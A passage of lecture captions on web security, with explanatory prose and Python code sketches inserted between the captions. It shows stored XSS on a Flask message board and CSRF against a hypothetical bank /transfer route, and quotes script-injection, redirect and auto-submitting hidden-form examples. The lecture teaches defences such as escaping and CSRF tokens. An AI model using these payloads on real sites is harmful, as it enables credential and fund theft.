dangerous HTML characters to help

1316
00:58:50,200 --> 00:58:51,980
avoid these types of situations.

1317
00:58:51,980 --> 00:58:54,010
But these are just good
things to be mindful of

1318
00:58:54,010 --> 00:58:59,110
and be careful about as we go about
designing these web applications.

1319
00:58:59,110 --> 00:59:02,770
Let's go ahead and take another look at
another example of cross-site scripting

1320
00:59:02,770 --> 00:59:04,420
and how it can happen.

1321
00:59:04,420 --> 00:59:07,269
What I will look at now is a
slightly more complicated site,

1322
00:59:07,269 --> 00:59:09,310
and this is one that Chrome
is actually not going

1323
00:59:09,310 --> 00:59:11,150
to be able to fully defend against.

1324
00:59:11,150 --> 00:59:16,090
And what this cross-site
scripting example is, is

1325
00:59:16,090 --> 00:59:19,472
a web application that is going
to display a message list.

1326
00:59:19,472 --> 00:59:20,680
It's sort of a message board.

1327
00:59:20,680 --> 00:59:23,380
We saw a brief example of something
that looked very similar to this

1328
00:59:23,380 --> 00:59:25,000
when we were first
taking a look at Flask

1329
00:59:25,000 --> 00:59:26,999
and how we're able to
render templates and such.

1330
00:59:26,999 --> 00:59:28,600
This one actually uses a database.

1331
00:59:28,600 --> 00:59:31,550
And I'll show you what it looks like.

1332
00:59:31,550 --> 00:59:33,460
We'll look at application.py.

1333
00:59:33,460 --> 00:59:35,699
So I have a SQLite
database that I'm going

1334
00:59:35,699 --> 00:59:38,365
to be using that's just going to
store a whole bunch of messages

1335
00:59:38,365 --> 00:59:40,750
so that it can be on this
public message board.

1336
00:59:40,750 --> 00:59:44,590
And effectively, I have just one
route, a default index route,

1337
00:59:44,590 --> 00:59:48,550
where if I'm just viewing
this page by a GET request,

1338
00:59:48,550 --> 00:59:51,777
just asking to see the page,
I skip over this POST stuff,

1339
00:59:51,777 --> 00:59:53,110
and I just get all the messages.

1340
00:59:53,110 --> 00:59:57,040
SELECT * FROM messages just gets
all the messages in the message board.

1341
00:59:57,040 --> 01:00:00,310
And then go ahead and render
this template, index.html, passing

1342
01:00:00,310 --> 01:00:01,870
in those messages.

1343
01:00:01,870 --> 01:00:05,830
And then, if it's a
POST request, then I'm

1344
01:00:05,830 --> 01:00:09,940
going to get whatever the contents
of the message that I'm trying to add

1345
01:00:09,940 --> 01:00:12,340
is, whatever came in through
this form, and then I'm

1346
01:00:12,340 --> 01:00:16,730
going to insert into my messages
table, whatever that content is.

1347
01:00:16,730 --> 01:00:20,350
So if I type in a new message and insert
it, I submit that via a POST request.

1348
01:00:20,350 --> 01:00:22,890
It gets added to my list
of growing messages.

1349
01:00:22,890 --> 01:00:25,270
And otherwise, if I'm just
requesting the page normally,

1350
01:00:25,270 --> 01:00:27,732
or even after something
is done being inserted,

1351
01:00:27,732 --> 01:00:29,440
I'm going to request
all the messages

1352
01:00:29,440 --> 01:00:32,800
by selecting them all from the
database and then rendering it inside

1353
01:00:32,800 --> 01:00:34,690
of index.html.

1354
01:00:34,690 --> 01:00:36,100
So what does that look like?

1355
01:00:36,100 --> 01:00:38,890
The result is that using just
these couple of lines of code,

1356
01:00:38,890 --> 01:00:42,820
I now have this Message List site
where I can type in foo as a message,

1357
01:00:42,820 --> 01:00:43,650
submit that.

1358
01:00:43,650 --> 01:00:46,600
And now the message foo is
there, bar goes in there,

1359
01:00:46,600 --> 01:00:48,670
and this gets added to
the public message board.

1360
01:00:48,670 --> 01:00:51,887
And of course, if I were to close
this site and I were to open it again

1361
01:00:51,887 --> 01:00:54,220
or someone else were to open
it again on their computer,

1362
01:00:54,220 --> 01:00:57,670
because it's all drawing from the same
database, now I go back here again.

1363
01:00:57,670 --> 01:01:00,920
Foo and bar are still there, so
those messages are still there.

1364
01:01:00,920 --> 01:01:08,958
And so where is the opportunity for
cross-site scripting attacks here?

1365
01:01:08,958 --> 01:01:12,201
AUDIENCE: You could store
a script in the database.

1366
01:01:12,201 --> 01:01:12,950
BRIAN YU: Exactly.

1367
01:01:12,950 --> 01:01:16,840
We could store a script in the database,
a script could be one of the messages.

1368
01:01:16,840 --> 01:01:19,820
Such that that JavaScript
code just gets inserted

1369
01:01:19,820 --> 01:01:23,094
into the HTML contents
of this page here,

1370
01:01:23,094 --> 01:01:24,510
and then it could potentially run.

1371
01:01:24,510 --> 01:01:31,460
So if I were to add a message that
was like <script>alert('hi')</script>,

1372
01:01:31,460 --> 01:01:35,214
and then submit that, well, what seems
to happen here is that when I try

1373
01:01:35,214 --> 01:01:37,130
and submit it, Chrome
is giving me some error.

1374
01:01:37,130 --> 01:01:39,880
It's giving me that same error as
before, this page isn't working.

1375
01:01:39,880 --> 01:01:41,089
Chrome detected unusual code.

1376
01:01:41,089 --> 01:01:43,921
Here's that cross-site scripting
auditor saying, hey, wait a minute,

1377
01:01:43,921 --> 01:01:44,880
something's wrong.

1378
01:01:44,880 --> 01:01:48,320
And the reason it was able
to do that is because when

1379
01:01:48,320 --> 01:01:50,600
I was submitting my request,
there was some JavaScript

1380
01:01:50,600 --> 01:01:52,100
included inside that request.

1381
01:01:52,100 --> 01:01:53,937
So Chrome was able to
detect that something

1382
01:01:53,937 --> 01:01:57,020
might be a little fishy there, that I
was submitting this JavaScript along

1383
01:01:57,020 --> 01:01:59,186
with the request, and then
it was coming back to me.

1384
01:01:59,186 --> 01:02:04,370
So what if I were to close
the page and open it again?

1385
01:02:04,370 --> 01:02:06,050
Now I'm just requesting the page.

1386
01:02:06,050 --> 01:02:08,672
There's no JavaScript in the
URL, and all that's happening

1387
01:02:08,672 --> 01:02:10,880
is that it's extracting
information from the database

1388
01:02:10,880 --> 01:02:12,590
and displaying it onto the page.

1389
01:02:12,590 --> 01:02:14,630
And so Chrome now has
no real way of knowing

1390
01:02:14,630 --> 01:02:17,360
that there is any potential
cross-site scripting involved.

1391
01:02:17,360 --> 01:02:19,940
So I go here, and now
I get the hi alert.

1392
01:02:19,940 --> 01:02:22,815
They were able to run arbitrary
JavaScript on this page.

1393
01:02:22,815 --> 01:02:25,190
And then I see foo and bar
and then just some empty thing

1394
01:02:25,190 --> 01:02:28,920
because that's where the
JavaScript code was before.

1395
01:02:28,920 --> 01:02:33,470
So here's an example of us being
able to find a cross-site scripting

1396
01:02:33,470 --> 01:02:37,040
vulnerability that we were able to take
advantage of, exploit, by just adding

1397
01:02:37,040 --> 01:02:39,720
JavaScript code into here as well.

1398
01:02:39,720 --> 01:02:43,085
And so I haven't been committing
these changes to the database.

1399
01:02:43,085 --> 01:02:44,210
I haven't been saving them.

1400
01:02:44,210 --> 01:02:47,390
So if I run this again, we'll
be reset back to a clean slate.

1401
01:02:47,390 --> 01:02:49,984
So if I go back here, I see
a blank message list again.

1402
01:02:49,984 --> 01:02:52,400
So what are some other things
that I could potentially do?

1403
01:02:52,400 --> 01:02:57,080
Well, I might be able to say
someone does foo and then bar.

1404
01:02:57,080 --> 01:02:58,540
Maybe I could say--

1405
01:02:58,540 --> 01:03:00,540
I just want to display
whatever contents I want.

1406
01:03:00,540 --> 01:03:03,905
So I'm going to add JavaScript that says
<script>document.body.innerHTML =

1407
01:03:03,905 --> 01:03:14,149
'whatever page I want'</script>,
and I submit that.

1408
01:03:14,149 --> 01:03:16,190
Again, Chrome blocks it
the first time because it

1409
01:03:16,190 --> 01:03:17,660
detects that, with
this request at least,

1410
01:03:17,660 --> 01:03:19,345
there was something fishy going along.

1411
01:03:19,345 --> 01:03:22,220
But when the next request comes in,
when the next person comes along,

1412
01:03:22,220 --> 01:03:24,489
they open this page, and now
the message list is gone.

1413
01:03:24,489 --> 01:03:26,780
I don't see foo and bar or
any of those other messages.

1414
01:03:26,780 --> 01:03:29,780
I just see whatever the contents of
the page that I wanted to show was.

1415
01:03:29,780 --> 01:03:32,387
And that gets displayed
to the user here.

1416
01:03:32,387 --> 01:03:34,220
So that's certainly one
thing they could do.

1417
01:03:34,220 --> 01:03:37,428
Certainly stealing cookies is another
thing that could happen in the same way

1418
01:03:37,428 --> 01:03:38,970
that we saw it in the last example.

1419
01:03:38,970 --> 01:03:40,490
Or someone could say, you know what?

1420
01:03:40,490 --> 01:03:42,650
Let's just take the user to
an entirely different site.

1421
01:03:42,650 --> 01:03:45,980
Let's take them to my site where I can
now try and steal information from them

1422
01:03:45,980 --> 01:03:49,990
as well by saying
window.location equals,

1423
01:03:49,990 --> 01:03:54,620
and I can say cs50.github.io/web.

1424
01:03:54,620 --> 01:03:59,012
And so now this window.location
equals some URL is the JavaScript code

1425
01:03:59,012 --> 01:03:59,720
that I'm running.

1426
01:03:59,720 --> 01:04:00,660
I'll submit that.

1427
01:04:00,660 --> 01:04:03,470
And when the next user comes along
and they try and go to my page,

1428
01:04:03,470 --> 01:04:04,670
now they're suddenly redirected.

1429
01:04:04,670 --> 01:04:06,350
I've taken them somewhere else entirely.

1430
01:04:06,350 --> 01:04:09,190
And if that other new page looks
sort of similar to the old page,

1431
01:04:09,190 --> 01:04:11,690
they might be tricked into
thinking it is the same old page.

1432
01:04:11,690 --> 01:04:14,939
And they might be interacting with it,
typing in their credentials, usernames,

1433
01:04:14,939 --> 01:04:18,620
and passwords, and now this hacker is
able to gain access to that as well.

1434
01:04:18,620 --> 01:04:21,770
And so how do we defend against
these sorts of cross-site scripting

1435
01:04:21,770 --> 01:04:23,300
vulnerabilities?

1436
01:04:23,300 --> 01:04:25,370
Well, Flask is actually
pretty good about this.

1437
01:04:25,370 --> 01:04:28,610
And by default, when you're rendering
a template with render_template,

1438
01:04:28,610 --> 01:04:32,480
and you're plugging in some information,
Flask will, by default, automatically

1439
01:04:32,480 --> 01:04:33,636
escape that stuff for you.

1440
01:04:33,636 --> 01:04:34,760
It will say, you know what?

1441
01:04:34,760 --> 01:04:37,725
This is stuff that could
potentially be JavaScript

1442
01:04:37,725 --> 01:04:40,850
or could potentially be unsafe, so
we'll go ahead and escape it and protect

1443
01:04:40,850 --> 01:04:41,892
that information for you.

1444
01:04:41,892 --> 01:04:43,683
Certainly not all
frameworks are like that,

1445
01:04:43,683 --> 01:04:46,070
and certainly if you're just
doing string concatenation

1446
01:04:46,070 --> 01:04:48,170
like we were in the previous
example, then that's

1447
01:04:48,170 --> 01:04:50,880
not something we can really rely on.

1448
01:04:50,880 --> 01:04:54,920
But if we take a look
at templates/index.html,

1449
01:04:54,920 --> 01:04:59,060
in order for this to really work
the way that I wanted it to,

1450
01:04:59,060 --> 01:05:02,870
I had to add this |safe
filter in here, where

1451
01:05:02,870 --> 01:05:06,560
this is my way of telling Jinja2,
the template rendering engine,

1452
01:05:06,560 --> 01:05:08,060
don't worry about escaping anything.

1453
01:05:08,060 --> 01:05:09,500
Just display the contents.

1454
01:05:09,500 --> 01:05:12,139
And so in reality, if you were
to just do message.content,

1455
01:05:12,139 --> 01:05:14,930
Flask would be smart enough to try
and defend against this for you.
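
To make the autoescaping point concrete without depending on Flask or Jinja2, here is a standard-library sketch of the message board: messages go into an in-memory SQLite table and are rendered into an HTML list, with the `autoescape=False` branch playing the role of `|safe` in the template. The table layout and function names are assumptions, since the demo's `application.py` isn't reproduced here; the `content` column echoes `message.content` from the template. Browser-side filters can't stand in for this kind of escaping; Chrome's XSS auditor, for example, was removed in Chrome 78.

```python
import sqlite3
from html import escape


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, content TEXT NOT NULL)")
    return db


def add_message(db: sqlite3.Connection, content: str) -> None:
    # The message is stored exactly as typed, script tags and all.
    db.execute("INSERT INTO messages (content) VALUES (?)", (content,))


def render_index(db: sqlite3.Connection, autoescape: bool = True) -> str:
    rows = db.execute("SELECT content FROM messages ORDER BY id").fetchall()
    items = []
    for (content,) in rows:
        # autoescape=True mirrors Jinja2's default; False mirrors {{ message.content|safe }}.
        text = escape(content) if autoescape else content
        items.append(f"<li>{text}</li>")
    return "<ul>\n" + "\n".join(items) + "\n</ul>"


db = make_db()
add_message(db, "foo")
add_message(db, "<script>alert('hi')</script>")
print(render_index(db))
```

Escaping at render time, rather than when saving, keeps the stored data intact and protects every page that displays it.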

1456
01:05:14,930 --> 01:05:16,763
But it is something
that you just want to be

1457
01:05:16,763 --> 01:05:20,820
careful about: any time you have text that
you think is safe, is it really safe?

1458
01:05:20,820 --> 01:05:23,780
Is there a potential for JavaScript
code to be injected into there?

1459
01:05:23,780 --> 01:05:27,320
And if you're generating the templates
yourself by string concatenation

1460
01:05:27,320 --> 01:05:30,770
like we were in the previous example,
is there an opportunity for cross-site

1461
01:05:30,770 --> 01:05:33,440
scripting to appear there as well?

1462
01:05:33,440 --> 01:05:37,850
And so that's certainly one of
the major vulnerabilities that

1463
01:05:37,850 --> 01:05:42,560
can come about as we start
to deal with JavaScript

1464
01:05:42,560 --> 01:05:45,486
and using JavaScript inside
of our web applications.

1465
01:05:45,486 --> 01:05:46,360
Questions about that?

1466
01:05:46,360 --> 01:05:49,600


1467
01:05:49,600 --> 01:05:50,350
All right.

1468
01:05:50,350 --> 01:05:52,810
Let's move on and take a look
at the next web framework

1469
01:05:52,810 --> 01:05:55,180
that we talked about, which
in particular was Django.

1470
01:05:55,180 --> 01:05:56,620
And so when we first
took a look at Django,

1471
01:05:56,620 --> 01:05:58,900
we looked at how we would go
about doing the same things we

1472
01:05:58,900 --> 01:06:01,540
did in Flask, about rendering
templates and displaying pages

1473
01:06:01,540 --> 01:06:04,090
and using server side
logic to handle requests.

1474
01:06:04,090 --> 01:06:06,020
And in particular, we looked at forms.

1475
01:06:06,020 --> 01:06:08,681
And when we did look at
forms, I had to add a line

1476
01:06:08,681 --> 01:06:10,930
to one of the forms that
seemed a little bit strange.

1477
01:06:10,930 --> 01:06:12,580
Does anyone remember what that line was?

1478
01:06:12,580 --> 01:06:13,080
Yes?

1479
01:06:13,080 --> 01:06:14,320
AUDIENCE: CSRF token.

1480
01:06:14,320 --> 01:06:16,690
BRIAN YU: Yeah, we added
the CSRF token line to it.

1481
01:06:16,690 --> 01:06:19,630
And I said don't worry about that
for now, we'll talk about it later.

1482
01:06:19,630 --> 01:06:22,296
And now is that time that we're
going to start talking about it.

1483
01:06:22,296 --> 01:06:25,420
CSRF stands for Cross-Site
Request Forgery.

1484
01:06:25,420 --> 01:06:27,910
And this is yet another
type of attack that people

1485
01:06:27,910 --> 01:06:30,910
can use where Cross-Site
Request Forgery is

1486
01:06:30,910 --> 01:06:35,920
the idea of trying to forge a
request to some other website

1487
01:06:35,920 --> 01:06:39,560
in order to take some action on a site that the
user might already be logged into.

1488
01:06:39,560 --> 01:06:41,330
And so what might be an example of that?

1489
01:06:41,330 --> 01:06:45,040
Let's say, for instance, that
someone was logged into their bank,

1490
01:06:45,040 --> 01:06:46,480
on their bank's website.

1491
01:06:46,480 --> 01:06:49,810
And I, on some other website,
wanted to try and trick

1492
01:06:49,810 --> 01:06:53,620
the user into transferring
some money to me, for instance.

1493
01:06:53,620 --> 01:06:55,140
How might I go about doing that?

1494
01:06:55,140 --> 01:06:56,890
Well, you might imagine
very simply that I

1495
01:06:56,890 --> 01:06:59,181
might start by creating a
website, my own website, that

1496
01:06:59,181 --> 01:07:00,790
looks something like this.

1497
01:07:00,790 --> 01:07:04,160
I have the body of my website,
I have an a href, a link.

1498
01:07:04,160 --> 01:07:09,610
And this link goes to
http://yourbank.com/transfer,

1499
01:07:09,610 --> 01:07:13,240
and then some arguments, some GET
parameters, transfer to Brian, amount,

1500
01:07:13,240 --> 01:07:14,920
2,800, for instance.

1501
01:07:14,920 --> 01:07:17,170
And if the bank is set
up in such a way,

1502
01:07:17,170 --> 01:07:21,640
where making a GET request to /transfer
by passing in as arguments who

1503
01:07:21,640 --> 01:07:25,057
you're transferring to and what
the amount is initiates a transfer,

1504
01:07:25,057 --> 01:07:27,640
now I've been able to create a
sort of security vulnerability.

1505
01:07:27,640 --> 01:07:30,420
So if this is what's
displayed on my page

1506
01:07:30,420 --> 01:07:33,820
and I can convince someone to click
here, so long as they're already

1507
01:07:33,820 --> 01:07:37,210
logged in to yourbank.com,
then clicking on that link

1508
01:07:37,210 --> 01:07:39,620
automatically will
initiate that transfer.

1509
01:07:39,620 --> 01:07:42,250
So if yourbank.com is
set up in that way,

1510
01:07:42,250 --> 01:07:45,550
such that transferring money just
happens via this GET request,

1511
01:07:45,550 --> 01:07:48,460
then that's certainly a way
that I could trick someone

1512
01:07:48,460 --> 01:07:50,350
into transferring money to me.

1513
01:07:50,350 --> 01:07:53,110
What are some ways to
protect against that?

1514
01:07:53,110 --> 01:07:58,027
What can yourbank.com do to make sure
that we can't do something like this?

1515
01:07:58,027 --> 01:07:59,860
Such that someone else
can't just add a link

1516
01:07:59,860 --> 01:08:02,026
that says click here and
then automatically initiate

1517
01:08:02,026 --> 01:08:03,010
the transfer of money.

1518
01:08:03,010 --> 01:08:03,210
Yeah?

1519
01:08:03,210 --> 01:08:05,335
AUDIENCE: When you're doing
an operation like this,

1520
01:08:05,335 --> 01:08:08,946
you want to send some
token with it so it

1521
01:08:08,946 --> 01:08:11,954
knows that it was you that's doing
it, and you're not being played.

1522
01:08:11,954 --> 01:08:13,120
BRIAN YU: Great, some token.

1523
01:08:13,120 --> 01:08:17,242
And certainly, we'll see more about
that when we get to some more details.

1524
01:08:17,242 --> 01:08:19,700
But right now, this is just a
link that you're clicking on.

1525
01:08:19,700 --> 01:08:21,310
So we're just clicking on a link.

1526
01:08:21,310 --> 01:08:23,278
And what else could the bank do?

1527
01:08:23,278 --> 01:08:24,819
But that's certainly one good answer.

1528
01:08:24,819 --> 01:08:28,691


1529
01:08:28,691 --> 01:08:32,174
AUDIENCE: Not expose a service
with a GET request like that.

1530
01:08:32,174 --> 01:08:32,840
BRIAN YU: Great.

1531
01:08:32,840 --> 01:08:34,304
Not expose a GET request like this.

1532
01:08:34,304 --> 01:08:35,720
That could certainly be something.

1533
01:08:35,720 --> 01:08:38,470
And in fact, this is something
that's generally good web practice.

1534
01:08:38,470 --> 01:08:42,444
That you don't want GET requests to
be modifying the state of something,

1535
01:08:42,444 --> 01:08:44,319
like modifying who has
what amounts of money.

1536
01:08:44,319 --> 01:08:47,231
That generally, all of that should
be inside of a POST request, such

1537
01:08:47,231 --> 01:08:49,939
that it really needs to be a form
submission that needs to happen

1538
01:08:49,939 --> 01:08:52,609
in order for the transfer to go through.
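
To make the GET-versus-POST point concrete, here is a minimal Python sketch. It assumes a hypothetical `handle_transfer` handler, a plain dictionary of balances, and the parameter names `to` and `amount` borrowed from the example link; it is not how any real bank or framework structures this. The only idea it shows is refusing to change state on anything other than a POST.

```python
from http import HTTPStatus

def handle_transfer(method: str, params: dict, balances: dict) -> HTTPStatus:
    """Hypothetical /transfer handler: only a POST may move money."""
    if method != "POST":
        # GET should be safe to repeat: it may read data but never change it.
        return HTTPStatus.METHOD_NOT_ALLOWED
    recipient = params["to"]
    amount = int(params["amount"])
    # "user" stands in for the logged-in account (an assumption of this sketch).
    balances["user"] -= amount
    balances[recipient] = balances.get(recipient, 0) + amount
    return HTTPStatus.OK
```

Requiring POST defeats the plain link and the image-tag trick, but on its own it does not stop a forged form submission; that still needs something like the CSRF token.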

1539
01:08:52,609 --> 01:08:54,800
And of course, maybe this
isn't such a big deal

1540
01:08:54,800 --> 01:08:57,979
because I'm saying, click here.

1541
01:08:57,979 --> 01:09:01,515
And so as long as the user is smart
and as long as they're careful and they

1542
01:09:01,515 --> 01:09:03,890
hover over the link and see,
oh, this is going to take me

1543
01:09:03,890 --> 01:09:07,370
to yourbank.com/transfer, then I'm safe.

1544
01:09:07,370 --> 01:09:09,180
So how might a hacker get around that?

1545
01:09:09,180 --> 01:09:11,990
In order to make it such that the
user doesn't need to click on

1546
01:09:11,990 --> 01:09:13,948
"click here" in order to
initiate that transfer?

1547
01:09:13,948 --> 01:09:18,074
AUDIENCE: They don't need
[INAUDIBLE] in other website.

1548
01:09:18,074 --> 01:09:18,740
BRIAN YU: Great.

1549
01:09:18,740 --> 01:09:22,160
So hypothetically, we could just
add some JavaScript code here

1550
01:09:22,160 --> 01:09:25,642
that says that rather than a link
that someone needs to click on,

1551
01:09:25,642 --> 01:09:28,100
we'll just add some JavaScript
code that will automatically

1552
01:09:28,100 --> 01:09:29,683
redirect the user there, for instance.

1553
01:09:29,683 --> 01:09:32,930
And that could be something
that could happen as well.

1554
01:09:32,930 --> 01:09:35,922
But then at minimum, the user
is taken to that other website,

1555
01:09:35,922 --> 01:09:38,130
and now they can see that
that transfer has happened.

1556
01:09:38,130 --> 01:09:40,671
But there are even more subtle
ways about doing this as well.

1557
01:09:40,671 --> 01:09:42,760
A couple of slides ago,
we

1558
01:09:42,760 --> 01:09:45,260
talked about how image tags,
for instance, can be used.

1559
01:09:45,260 --> 01:09:48,590
Where if you provide the link to
whatever the source of the image is,

1560
01:09:48,590 --> 01:09:51,300
that will automatically trigger
a request there as well.

1561
01:09:51,300 --> 01:09:54,740
And so you might imagine that instead of
structuring my hacking page like this,

1562
01:09:54,740 --> 01:09:59,360
if I tried this as my exploit instead,
just render an image where the source

1563
01:09:59,360 --> 01:10:03,680
of that image is yourbank.com/transfer
and here's what I'm transferring.

1564
01:10:03,680 --> 01:10:06,420
Now, no need for a user to
click on any link at all.

1565
01:10:06,420 --> 01:10:08,800
As soon as they go to my
page, your web browser

1566
01:10:08,800 --> 01:10:11,030
is going to make a request
to this URL, and that's

1567
01:10:11,030 --> 01:10:15,410
going to potentially start
to initiate a transfer.

1568
01:10:15,410 --> 01:10:18,900
And so that's certainly a
potential security vulnerability.

1569
01:10:18,900 --> 01:10:21,380
And so someone suggested
OK, well, rather

1570
01:10:21,380 --> 01:10:25,250
than make your bank take all of
its transfers via GET requests,

1571
01:10:25,250 --> 01:10:27,540
we might instead want to do
this via making it a form

1572
01:10:27,540 --> 01:10:29,540
that someone needs to
submit, some POST request.

1573
01:10:29,540 --> 01:10:33,050
That it can't just be you clicking
on a link or you rendering some image

1574
01:10:33,050 --> 01:10:36,210
that's going to trigger
the transfer of funds.

1575
01:10:36,210 --> 01:10:41,330
So maybe you might imagine that
I could do something like this.

1576
01:10:41,330 --> 01:10:44,150
This might be an exploit that
I can use now on my site.

1577
01:10:44,150 --> 01:10:48,320
That I create a form whose
action is yourbank.com/transfer,

1578
01:10:48,320 --> 01:10:51,680
the method is POST, and now I
have these hidden inputs,

1579
01:10:51,680 --> 01:10:53,150
input type equals hidden.

1580
01:10:53,150 --> 01:10:55,950
This is an input type that's just
not going to appear to the user.

1581
01:10:55,950 --> 01:10:57,720
The user is not going
to see this at all.

1582
01:10:57,720 --> 01:11:01,826
It's an input named "to", whose value
is who I want to transfer the money to.

1583
01:11:01,826 --> 01:11:04,700
I have an input that is the
amount, which is the amount of money

1584
01:11:04,700 --> 01:11:06,410
that I want to transfer.

1585
01:11:06,410 --> 01:11:08,870
And then I have an input
of type submit,

1586
01:11:08,870 --> 01:11:11,900
which is just going to be a
button that says click here.

1587
01:11:11,900 --> 01:11:16,430
And so all the user is going to see,
if this code is rendered, is what?

1588
01:11:16,430 --> 01:11:18,090
What does the user see?

1589
01:11:18,090 --> 01:11:19,000
AUDIENCE: Click here.

1590
01:11:19,000 --> 01:11:19,490
BRIAN YU: Exactly.

1591
01:11:19,490 --> 01:11:21,448
They just see this one
input field, this button

1592
01:11:21,448 --> 01:11:24,320
that says click here, because
these two input fields are hidden.

1593
01:11:24,320 --> 01:11:26,194
And of course, click
here could say anything.

1594
01:11:26,194 --> 01:11:28,116
It could say next page, for instance.

1595
01:11:28,116 --> 01:11:30,740
Something benign that looks like
something you might reasonably

1596
01:11:30,740 --> 01:11:32,656
just click that would
take you somewhere else,

1597
01:11:32,656 --> 01:11:35,960
when in reality, it's submitting a
form that's going to transfer funds

1598
01:11:35,960 --> 01:11:38,180
to someone and to some amount.

1599
01:11:38,180 --> 01:11:41,010
But of course, maybe we're OK
because if the user is careful

1600
01:11:41,010 --> 01:11:43,310
and they're not going to
click on the button, then--

1601
01:11:43,310 --> 01:11:44,480
and then if they're not
clicking on a button

1602
01:11:44,480 --> 01:11:47,438
when they don't know what that button
actually does, then they're safe.

1603
01:11:47,438 --> 01:11:52,970
How might a hacker still get around
this and still be able to get the user

1604
01:11:52,970 --> 01:11:54,669
to submit this form?

1605
01:11:54,669 --> 01:11:56,460
Even without the user
clicking on a button.

1606
01:11:56,460 --> 01:12:01,421


1607
01:12:01,421 --> 01:12:01,920
Yeah?

1608
01:12:01,920 --> 01:12:05,185
AUDIENCE: Can you do a POST
request from JavaScript code?

1609
01:12:05,185 --> 01:12:07,560
BRIAN YU: Can you do a POST
request from JavaScript code?

1610
01:12:07,560 --> 01:12:08,739
Certainly you can.

1611
01:12:08,739 --> 01:12:10,530
We actually looked at
ways we could do that

1612
01:12:10,530 --> 01:12:14,561
before when we were talking about
AJAX and making requests to a server

1613
01:12:14,561 --> 01:12:16,560
in order to get more
information from the server

1614
01:12:16,560 --> 01:12:18,660
after we've already loaded the page.

1615
01:12:18,660 --> 01:12:20,542
So that's certainly one option as well.

1616
01:12:20,542 --> 01:12:23,250
Another way we could do it is just
by adding this additional line

1617
01:12:23,250 --> 01:12:26,130
to the body, on load--
when you're done loading--

1618
01:12:26,130 --> 01:12:27,890
here's what the body should do.

1619
01:12:27,890 --> 01:12:32,220
document.forms[0], get the first form
in the document and submit it.

1620
01:12:32,220 --> 01:12:34,410
Just by adding that single
line of JavaScript code,

1621
01:12:34,410 --> 01:12:38,080
now as soon as the user loads this
page, this form will be submitted,

1622
01:12:38,080 --> 01:12:42,972
and then that will initiate
the transfer at yourbank.com.

1623
01:12:42,972 --> 01:12:46,830
So certainly, this isn't a
good scenario we want to be in.

1624
01:12:46,830 --> 01:12:49,620
This is CSRF, Cross-Site
Request Forgery,

1625
01:12:49,620 --> 01:12:54,540
where we are able to create
a request to some other site

1626
01:12:54,540 --> 01:12:57,690
and pretend that request was
originally from yourbank.com in order

1627
01:12:57,690 --> 01:12:59,040
to initiate the transfer.

1628
01:12:59,040 --> 01:13:02,160
And so long as I know what
parameters that request takes,

1629
01:13:02,160 --> 01:13:03,874
I'm able to forge that request.

1630
01:13:03,874 --> 01:13:05,790
And so the solution, as
was pointed out, which

1631
01:13:05,790 --> 01:13:08,910
is what Django uses and a bunch
of other web frameworks use,

1632
01:13:08,910 --> 01:13:11,880
is to add a special token,
effectively a password.

1633
01:13:11,880 --> 01:13:16,260
Where the idea is that you would
write this inside of your Django code,

1634
01:13:16,260 --> 01:13:19,800
and if you were to look at the HTML
that gets rendered as a result, what's

1635
01:13:19,800 --> 01:13:23,790
actually happening is that
in place of CSRF token,

1636
01:13:23,790 --> 01:13:26,460
the web server, the
Django web server, is

1637
01:13:26,460 --> 01:13:30,390
inserting some long string,
effectively a token or a password,

1638
01:13:30,390 --> 01:13:32,850
that is associated with
this specific form.

1639
01:13:32,850 --> 01:13:35,220
Such that when the
user submits that form,

1640
01:13:35,220 --> 01:13:37,140
the token is submitted along with it.

1641
01:13:37,140 --> 01:13:40,200
And the server can then check
to see does this token match

1642
01:13:40,200 --> 01:13:41,700
the token that I initially sent out.

1643
01:13:41,700 --> 01:13:44,460
And if and only if
they match, then we're

1644
01:13:44,460 --> 01:13:46,290
going to actually initiate the transfer.

1645
01:13:46,290 --> 01:13:50,880
That way, no other website is able to
forge a request to my bank's transfer

1646
01:13:50,880 --> 01:13:53,610
website because they're not
going to know what the token is.

1647
01:13:53,610 --> 01:13:56,070
It's going to be a new token
every time we make a request,

1648
01:13:56,070 --> 01:14:01,080
and that's going to allow us to avoid
a situation where someone might be able

1649
01:14:01,080 --> 01:14:02,670
to-- from some other site--

1650
01:14:02,670 --> 01:14:08,520
make a request that attacks the
/transfer route in this case.
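
The token check described above can be sketched in Python. This is a simplified per-session variant of the idea, not Django's actual implementation (which differs in its details); the `session` dictionary, the field name `csrf_token`, and the helper functions are hypothetical. It uses the standard library's `secrets` module to generate an unguessable token and `hmac.compare_digest` to compare tokens in constant time.

```python
import hmac
import secrets
from typing import Optional

def issue_csrf_token(session: dict) -> str:
    """Generate an unguessable token and remember it on the server side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def render_transfer_form(session: dict) -> str:
    """Embed the token as a hidden field, much as a template tag would."""
    token = issue_csrf_token(session)
    return (
        '<form action="/transfer" method="post">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to"><input name="amount">'
        '<input type="submit" value="Transfer">'
        "</form>"
    )

def is_valid_csrf(session: dict, submitted: Optional[str]) -> bool:
    """Accept a POST only if it carries the token this session was given."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Compare as bytes in constant time so timing reveals nothing useful.
    return hmac.compare_digest(expected.encode(), submitted.encode())
```

An attacker's page can still make the browser submit a form to /transfer, but it cannot read the token embedded in the bank's own page, so the forged request fails the check.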

1651
01:14:08,520 --> 01:14:11,112
So that's why Django has
that CSRF token in place.

1652
01:14:11,112 --> 01:14:13,070
It's to prevent against
those kinds of attacks.

1653
01:14:13,070 --> 01:14:16,350
Flask on its own doesn't, by default,
have this sort of protection built in,

1654
01:14:16,350 --> 01:14:19,830
although there are extensions that
you can add on to Flask

1655
01:14:19,830 --> 01:14:24,120
in order to add protection against
this particular type of attack

1656
01:14:24,120 --> 01:14:25,607
in Flask as well.

1657
01:14:25,607 --> 01:14:27,690
So these are also just
good things to be aware of,

1658
01:14:27,690 --> 01:14:29,795
potential security
vulnerabilities that can exist,

1659
01:14:29,795 --> 01:14:32,670
and things you'll want to think
about as you design your application.

1660
01:14:32,670 --> 01:14:36,660
Can just anyone initiate a transfer
request by submitting a POST request

1661
01:14:36,660 --> 01:14:39,570
or do they need some special,
potentially changing token

1662
01:14:39,570 --> 01:14:42,670
in order to do that?

1663
01:14:42,670 --> 01:14:44,843
Questions about the
security vulnerabilities

1664
01:14:44,843 --> 01:14:48,300
we've talked about so far?

1665
